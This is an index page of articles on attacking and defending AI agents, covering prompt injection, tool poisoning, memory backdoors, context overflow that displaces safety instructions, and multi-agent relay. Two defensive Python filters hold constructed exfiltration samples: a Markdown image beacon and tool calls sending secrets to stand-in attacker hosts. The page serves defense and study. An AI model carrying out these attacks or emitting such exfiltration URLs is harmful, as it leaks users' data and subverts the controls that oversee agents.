# agent-security
20 articles tagged with “agent-security”
Exfiltration via links
Using hyperlinks, redirects or URL parameters to exfiltrate data from AI systems through markdown links, tool-generated URLs and abuse of API callbacks.
Injection via Markdown images
Injecting Markdown image tags with attacker-controlled URLs to exfiltrate conversation data through HTTP image requests.
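The two entries above describe the same channel from the defender's side: anything the model emits that a client renders as a URL is a request the attacker controls. The following output filter is an added example, not code from any of the listed articles; it strips Markdown images and unlinks Markdown links whose host is not on a hypothetical allowlist (`ALLOWED_HOSTS`), and flags long query strings on allowed hosts, since those are the usual carrier for the leaked data. The sample model output is constructed.

```python
import re
from urllib.parse import urlparse

# Hosts the client is allowed to load images from or link to.
# Assumption: hypothetical allowlist for the deployment, not a real default.
ALLOWED_HOSTS = {"docs.example.com"}

# Inline Markdown image ![alt](url) or link [text](url), optional title.
# Group 1 is "!" for images; group 3 is the URL (non-greedy, stops at ")").
MD_REF = re.compile(r'(!?)\[([^\]]*)\]\(\s*(\S+?)(?:\s+"[^"]*")?\s*\)')

# Query strings longer than this are treated as a likely leak even on an
# allowed host (base64 of a few hundred bytes of conversation fits here).
MAX_QUERY_LEN = 64


def classify_url(url):
    """Return 'allowed', 'blocked' or 'suspicious' for a URL in model output."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return "blocked"              # data:, javascript:, file: and friends
    if parsed.hostname not in ALLOWED_HOSTS:
        return "blocked"              # unknown host: a request the attacker sees
    if len(parsed.query) > MAX_QUERY_LEN:
        return "suspicious"           # allowed host, but carrying a payload
    return "allowed"


def sanitize(markdown):
    """Rewrite model output before it reaches a renderer.

    Images to non-allowed URLs are removed outright, because the client fetches
    them without a click. Links keep their visible text but lose the target.
    Returns (clean_text, findings), findings being (verdict, url) pairs."""
    findings = []

    def repl(match):
        bang, text, url = match.group(1), match.group(2), match.group(3)
        verdict = classify_url(url)
        if verdict == "allowed":
            return match.group(0)
        findings.append((verdict, url))
        return "" if bang else text

    return MD_REF.sub(repl, markdown), findings


# Constructed sample of model output containing an exfiltration attempt:
# an image beacon with base64 in the query and a link to an attacker host.
SAMPLE_OUTPUT = (
    "Summary of your document.\n"
    "![loading](https://attacker.invalid/p.png?d=c2VjcmV0LXRva2Vu)\n"
    "See [the docs](https://docs.example.com/guide) and "
    "[details](https://evil.invalid/r?session=abc).\n"
)

if __name__ == "__main__":
    clean, found = sanitize(SAMPLE_OUTPUT)
    print(clean)
    for verdict, url in found:
        print(verdict, url)
```

The filter only covers inline Markdown syntax; reference-style links, autolinks in angle brackets and raw HTML need the same treatment, and the renderer itself should additionally refuse to load remote images unless the host is on the list, so the filter is not the only control.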
Bypassing permission boundaries
Escalating from restricted to elevated permissions in AI agent systems through scope creep, implicit permission inheritance and capability confusion.
LangChain Security Deep Dive (Agentic Exploitation)
Comprehensive security analysis of LangChain and LangGraph, covering dangerous default settings, attacks on chain composition, callback exploitation, risks of community tools and vulnerabilities in agent executors.
Case study: MCP tool poisoning attacks (Invariant Labs 2025)
Analysis of tool poisoning vulnerabilities in the Model Context Protocol (MCP) discovered by Invariant Labs, where malicious tool descriptions manipulate AI agents into data exfiltration and unauthorized actions.
CaMeL & the Dual LLM pattern
Architectural defense patterns that separate trusted from untrusted processing: Simon Willison's Dual LLM concept and Google DeepMind's CaMeL framework for defending tool-using AI agents against prompt injection.
Attacking A2A trust boundaries
Advanced walkthrough of exploiting trust boundaries between agents in multi-agent systems using the Agent-to-Agent (A2A) protocol.
Agent context overflow
Walkthrough of overflowing agent context windows to push safety instructions out of the LLM's attention, enabling bypasses of system prompts and guardrails.
Agent loop hijacking
Advanced walkthrough of hijacking agentic loops to redirect autonomous agent behavior, alter reasoning chains, and achieve persistent control over multi-step agent workflows.
Agent persistence via memory
Advanced walkthrough of using agent memory systems to create persistent backdoors that survive restarts, updates, and session boundaries.
Abusing callbacks in MCP
Advanced walkthrough of abusing MCP callback mechanisms for unauthorized actions, data exfiltration, and privilege escalation in agent-tool interactions.
Parameter injection in function calling
Walkthrough of manipulating function call parameters through prompt-level techniques, injecting malicious values into LLM-generated API calls.
Tool shadowing in MCP
Advanced walkthrough of creating shadow tools that override legitimate MCP (Model Context Protocol) tools, enabling interception and manipulation of agent-tool interactions.
Memory poisoning step by step
Walkthrough of persisting injection payloads in agent memory systems to achieve long-term compromise of LLM-based agents.
Multi-agent prompt relay
Advanced walkthrough of relaying prompt injection payloads across multiple agents in a pipeline, achieving cascading compromise of multi-agent systems.
Manipulating the orchestrator
Advanced walkthrough of attacking the orchestrator layer in multi-agent systems to gain control over task delegation, agent coordination, and system-wide behavior.
Plugin confusion attack
Walkthrough of confusing LLM agents about which plugin or tool to invoke, causing them to call the wrong tool or pass data to unintended destinations.
Injection via tool calls
Step-by-step walkthrough of injecting malicious parameters into LLM tool and function calls to execute unauthorized actions in agent systems.
Sandboxing and permission models for tool-using agents
Walkthrough for implementing sandboxing and permission models that constrain tool-using LLM agents, covering least-privilege design, parameter validation, execution sandboxes, approval workflows, and audit logging.
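The entry above lists least-privilege design, parameter validation, approval workflows and audit logging as the building blocks; the gatekeeper below is an added example of how they combine in front of tool execution, and is not code from that walkthrough or from any agent framework. The roles, tool names, host allowlist and policy table are hypothetical. The point it makes is that the tool name and arguments come from model output and are therefore attacker-influenced input (this is the parameter-injection and tool-call-injection case from the entries above), so the harness validates them, never the model.

```python
from urllib.parse import urlparse

# Hypothetical per-role policy: which tools a role may call, and which of those
# need a human approval step before they run. Assumption, not a framework API.
POLICY = {
    "reader":   {"allowed": {"search_docs", "fetch_url"}, "needs_approval": set()},
    "operator": {"allowed": {"search_docs", "fetch_url", "send_email"},
                 "needs_approval": {"send_email"}},
}

# Hosts fetch_url may reach. Assumption: illustrative allowlist.
FETCH_ALLOWED_HOSTS = {"docs.example.com", "api.example.com"}


# One validator per tool. Each checks types and bounds on the model-supplied
# arguments so an injected value cannot reach the tool unexamined.
def _ok_search(args):
    query = args.get("query")
    return isinstance(query, str) and 0 < len(query) <= 200


def _ok_fetch(args):
    url = args.get("url")
    if not isinstance(url, str):
        return False
    parsed = urlparse(url)
    return parsed.scheme in ("http", "https") and parsed.hostname in FETCH_ALLOWED_HOSTS


def _ok_email(args):
    to, body = args.get("to"), args.get("body", "")
    return (isinstance(to, str) and to.endswith("@example.com")
            and isinstance(body, str) and len(body) <= 2000)


VALIDATORS = {"search_docs": _ok_search, "fetch_url": _ok_fetch, "send_email": _ok_email}


def decide(role, call, approved=False):
    """Policy decision for one model-generated tool call.

    `call` is the parsed function call, e.g. {"name": ..., "arguments": {...}}.
    Returns ("allow" | "deny", reason). Checks run in least-privilege order:
    role known -> tool in role's allowlist -> arguments valid -> approval present."""
    name = call.get("name")
    args = call.get("arguments")
    policy = POLICY.get(role)
    if policy is None:
        return "deny", f"unknown role {role!r}"
    if name not in policy["allowed"]:
        return "deny", f"tool {name!r} not in allowlist for role {role!r}"
    if not isinstance(args, dict) or not VALIDATORS[name](args):
        return "deny", f"argument validation failed for {name!r}"
    if name in policy["needs_approval"] and not approved:
        return "deny", f"{name!r} requires human approval"
    return "allow", "policy checks passed"


def screen_calls(role, calls, audit_log, approved=False):
    """Gate a batch of tool calls; every decision is appended to audit_log.

    Returns only the calls that may be executed. Denied calls are logged with
    their arguments so an injected value is visible to the analyst later."""
    permitted = []
    for call in calls:
        decision, reason = decide(role, call, approved)
        audit_log.append({"role": role, "tool": call.get("name"),
                          "arguments": call.get("arguments"),
                          "decision": decision, "reason": reason})
        if decision == "allow":
            permitted.append(call)
    return permitted


# Constructed batch as a model might emit it after reading an injected page:
# a legitimate search, then an exfiltration fetch, then an unapproved email.
SAMPLE_CALLS = [
    {"name": "search_docs", "arguments": {"query": "vacation policy"}},
    {"name": "fetch_url", "arguments": {"url": "https://attacker.invalid/c?d=secret"}},
    {"name": "send_email", "arguments": {"to": "x@attacker.invalid", "body": "leak"}},
]

if __name__ == "__main__":
    log = []
    print(screen_calls("reader", SAMPLE_CALLS, log))
    for entry in log:
        print(entry["decision"], entry["tool"], entry["reason"])
```

Executing the permitted calls in a separate process or container with no ambient credentials is the remaining step; this gatekeeper decides what may run, the sandbox limits what a run can do if a validator is wrong.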
Security testing of LangChain applications
Step-by-step walkthrough for identifying and exploiting security vulnerabilities in LangChain-based applications, covering chain injection, agent manipulation, tool abuse, retrieval poisoning, and memory extraction attacks.